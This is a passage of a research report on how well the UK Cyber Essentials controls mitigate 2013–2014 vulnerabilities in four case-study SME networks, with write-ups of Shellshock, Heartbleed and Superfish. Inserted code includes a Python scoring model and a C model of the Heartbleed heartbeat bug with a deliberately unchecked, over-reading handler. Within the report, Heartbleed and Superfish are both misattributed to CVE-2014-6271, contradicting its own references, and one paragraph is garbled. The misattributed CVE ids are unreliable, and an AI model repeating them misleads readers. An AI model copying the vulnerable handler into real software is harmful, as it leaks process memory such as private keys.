Mitigation Assessment

The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated, or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use, or likely in use (based on the SME's practice), are deemed applicable to the network.
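The applicability and mitigation rules above can be written down as an explicit decision procedure, which makes the double-vetting reproducible. The following is an added illustration, not the report's own tooling: the CVE ids come from the report's CVE Details table, but the vendor, product, fix status and "required software" attributes attached to them are constructed assumptions for the example, not the report's assessment of those CVEs.

```python
"""Qualitative Cyber Essentials mitigation assessment (illustrative model).

Encodes the report's rules: a hardware CVE applies to a network that uses a
like-product from the same vendor; a software CVE applies only when that
software is in use; without the CE controls nothing is mitigated; with them,
patch management mitigates patched flaws, vendor-pending fixes give partial
mitigation, and inherently flawed devices are not mitigated by tooling.
"""
from collections import Counter
from dataclasses import dataclass, field

MITIGATED = "mitigated"
PARTIAL = "partially mitigated"
NOT_MITIGATED = "not mitigated"
NOT_APPLICABLE = "not applicable"


@dataclass(frozen=True)
class Vuln:
    cve: str
    vendor: str            # vendor of the affected product
    product: str
    kind: str              # "hardware" or "software"
    fix: str               # "patched", "pending" (vendor fix awaited) or "unfixable"
    web_delivered: bool = False   # reached through a crafted web site (browser flaws)


@dataclass
class Network:
    name: str
    hardware_vendors: set
    software_in_use: set
    required_software: set = field(default_factory=set)  # cannot be avoided by config


def applicable(v: Vuln, net: Network) -> bool:
    """Applicability rule from the Mitigation Assessment section."""
    if v.kind == "hardware":
        return v.vendor in net.hardware_vendors   # like-product, same vendor
    return v.product in net.software_in_use


def assess(v: Vuln, net: Network, cyber_essentials: bool) -> str:
    """Qualitative verdict for one CVE on one network, with or without CE."""
    if not applicable(v, net):
        return NOT_APPLICABLE
    if not cyber_essentials:
        # the report found none of the assessed attacks mitigated without CE
        return NOT_MITIGATED
    if v.fix == "patched":
        return MITIGATED       # patch management returns the system to a secure state
    if v.fix == "pending":
        return PARTIAL         # secure only once the vendor releases a fix
    # unfixable: secure configuration can avoid a flawed browser, but a browser
    # the SME cannot do without leaves website blacklisting as the only defence,
    # and an inherently flawed device is not mitigated by tooling at all
    if v.kind == "software" and v.web_delivered:
        return PARTIAL if v.product in net.required_software else MITIGATED
    return NOT_MITIGATED       # the device should be replaced


def summarise(vulns, net: Network, cyber_essentials: bool) -> dict:
    """Count verdicts over the CVEs applicable to a network (Figure 1 style)."""
    counts = Counter(assess(v, net, cyber_essentials) for v in vulns)
    return {s: counts[s] for s in (MITIGATED, PARTIAL, NOT_MITIGATED)}


# CVE ids from the report's table; the attributes are constructed for illustration
SAMPLE_VULNS = [
    Vuln("CVE-2014-3814", "Juniper", "ScreenOS", "hardware", "patched"),
    Vuln("CVE-2014-2103", "Cisco", "IPS", "hardware", "pending"),
    Vuln("CVE-2014-3872", "D-Link", "DAP-1350", "hardware", "unfixable"),
    Vuln("CVE-2014-3507", "OpenSSL", "OpenSSL", "software", "patched"),
    Vuln("CVE-2014-9357", "Docker", "Docker", "software", "patched"),
    Vuln("CVE-2014-2768", "Microsoft", "Internet Explorer", "software", "unfixable", True),
]

# constructed networks loosely shaped like the finance and web-development cases
FINANCE = Network("finance-like", {"Juniper", "Cisco"}, {"OpenSSL", "Internet Explorer"})
WEB_DEV = Network("web-dev-like", {"D-Link"}, {"Docker", "Internet Explorer"},
                  required_software={"Internet Explorer"})

if __name__ == "__main__":
    for net in (FINANCE, WEB_DEV):
        for ce in (False, True):
            print(net.name, "with CE" if ce else "without CE",
                  summarise(SAMPLE_VULNS, net, ce))
```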


Analysis

The analysis of the data collected has been split into sections. First, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used in each SME network configuration is included.

The full table for the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.

Full Vulnerabilities Assessment

Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 vulnerabilities were partially mitigated, and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, but they will be mitigated once a security fix has been released. Whatever level of security tooling is deployed on a network, the security of third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to respond quickly to security breaches as they become apparent with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether more suitable and potentially more secure solutions are available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update

For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.

Case Studies

Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilizing an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.

SME Network One - Finance Sector

Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Heuwai for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site a Windows File Server (SAMBA) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and firewall rules are in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.

CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster Page 6 of 28

User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it is placed in the firing line for a large number of browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, the SME ends up with several different browsers, with several versions of each, to cover all its requirements, opening it up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.

SME Network Two - Specialist Group

Physical Infrastructure: The second SME participant employs 20-25 people based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network Equipment includes an external Dell PowerEdge Server, four TP-Link Switch Access Points and a TP-Link DHCP Router.

Figure 7: SME-2 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows XP, Windows 7 & Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: Email, Files & Database as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server, database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless the device is validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network Equipment includes an external Dell PowerEdge Server, one TP-Link Switch Access Point and a TP-Link DHCP Router.

Figure 9: SME-3 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows 7 & Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: Email, Files & Database as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and Cloud Service Access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through on-line services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so these will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and the reception of guests, so it enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Local - File, Email, Database and Domain Servers are the most common local service providers, all present in more than a third of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from Survey Respondents' data considers the overall response in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL Router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.


Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the Survey Respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information is likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.


Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock". NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.

"Heartbleed"

Appearing in April 2014, the CVE-2014-6271 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-6271 [12]
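As an added illustration (not part of the report, and not OpenSSL's code), the following C model contrasts a heartbeat handler that trusts the declared payload length with one that applies the kind of length check the fix introduced; the record layout, the buffer contents, the constants and the function names are all constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a TLS heartbeat body (RFC 6520 layout):
 *   type (1 byte) | payload_length (2 bytes, big-endian) | payload | padding (>= 16 bytes)
 * The responder echoes payload_length bytes of payload back to the sender. */
#define HB_REQUEST      1
#define HB_MIN_PADDING  16
#define HB_HEADER_LEN   3

/* Vulnerable shape: the declared length is never compared with the bytes
 * actually received, so memcpy walks past the record into adjacent memory. */
static int heartbeat_reply_unchecked(const uint8_t *rec, size_t rec_len,
                                     uint8_t *out, size_t out_cap)
{
    if (rec_len < HB_HEADER_LEN || rec[0] != HB_REQUEST) return -1;
    size_t payload_len = ((size_t)rec[1] << 8) | rec[2];
    if (payload_len > out_cap) return -1;           /* only the output is bounded */
    memcpy(out, rec + HB_HEADER_LEN, payload_len);  /* over-read if payload_len > rec_len - 3 */
    return (int)payload_len;
}

/* Hardened shape: the record must hold header + declared payload + minimum
 * padding, otherwise it is silently discarded. */
static int heartbeat_reply_checked(const uint8_t *rec, size_t rec_len,
                                   uint8_t *out, size_t out_cap)
{
    if (rec_len < HB_HEADER_LEN + HB_MIN_PADDING || rec[0] != HB_REQUEST) return -1;
    size_t payload_len = ((size_t)rec[1] << 8) | rec[2];
    if (HB_HEADER_LEN + payload_len + HB_MIN_PADDING > rec_len) return -1;
    if (payload_len > out_cap) return -1;
    memcpy(out, rec + HB_HEADER_LEN, payload_len);
    return (int)payload_len;
}

/* Constructed memory image: a 23-byte record (payload "ping" + 16 bytes padding)
 * whose length field claims 64 bytes, followed in the same buffer by unrelated
 * data standing in for other process memory (a constructed placeholder). */
#define REC_LEN  (HB_HEADER_LEN + 4 + HB_MIN_PADDING)   /* 23 */
#define CLAIMED  64
static const char NEIGHBOUR[] = "SAMPLE-PRIVATE-KEY-BYTES";

static void build_sample(uint8_t *mem, size_t mem_len)
{
    memset(mem, 0, mem_len);
    mem[0] = HB_REQUEST;
    mem[1] = (CLAIMED >> 8) & 0xff;
    mem[2] = CLAIMED & 0xff;
    memcpy(mem + HB_HEADER_LEN, "ping", 4);
    memcpy(mem + REC_LEN, NEIGHBOUR, sizeof NEIGHBOUR - 1);
}

/* Bytes the unchecked handler echoes for the malformed record (64, not 4). */
int demo_unchecked_reply_len(void)
{
    uint8_t mem[128], out[128];
    build_sample(mem, sizeof mem);
    return heartbeat_reply_unchecked(mem, REC_LEN, out, sizeof out);
}

/* 1 if the unchecked echo carried the neighbouring data out with it. */
int demo_unchecked_leaks_neighbour(void)
{
    uint8_t mem[128], out[128];
    build_sample(mem, sizeof mem);
    int n = heartbeat_reply_unchecked(mem, REC_LEN, out, sizeof out);
    size_t off = REC_LEN - HB_HEADER_LEN;   /* offset of the neighbour inside the echo */
    return n > 0 && (size_t)n >= off + sizeof NEIGHBOUR - 1 &&
           memcmp(out + off, NEIGHBOUR, sizeof NEIGHBOUR - 1) == 0;
}

/* Checked handler's verdict on the same malformed record (-1: dropped). */
int demo_checked_rejects(void)
{
    uint8_t mem[128], out[128];
    build_sample(mem, sizeof mem);
    return heartbeat_reply_checked(mem, REC_LEN, out, sizeof out);
}

/* Checked handler once the length field is honest (4 bytes echoed). */
int demo_checked_accepts_honest(void)
{
    uint8_t mem[128], out[128];
    build_sample(mem, sizeof mem);
    mem[1] = 0; mem[2] = 4;                  /* declare the real payload size */
    return heartbeat_reply_checked(mem, REC_LEN, out, sizeof out);
}

int main(void)
{
    printf("unchecked: echoed %d bytes, neighbour leaked=%d\n",
           demo_unchecked_reply_len(), demo_unchecked_leaks_neighbour());
    printf("checked: malformed=%d, honest=%d\n",
           demo_checked_rejects(), demo_checked_accepts_honest());
    return 0;
}
```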

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-to-be-updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.

"Superfish"

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2014-6271 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo and other manufacturers' equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signed certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they then have full access to any SSL-secured connection from the target machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.


Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, to deliver additional security through indirect measures such as User Education & Awareness along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most commonly used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn't necessarily understood by individuals as a tool to greatly improve cyber-security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.

Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension to, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle these other types of attacks mentioned above, which were not under the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-'-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyber Controls Applicability

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
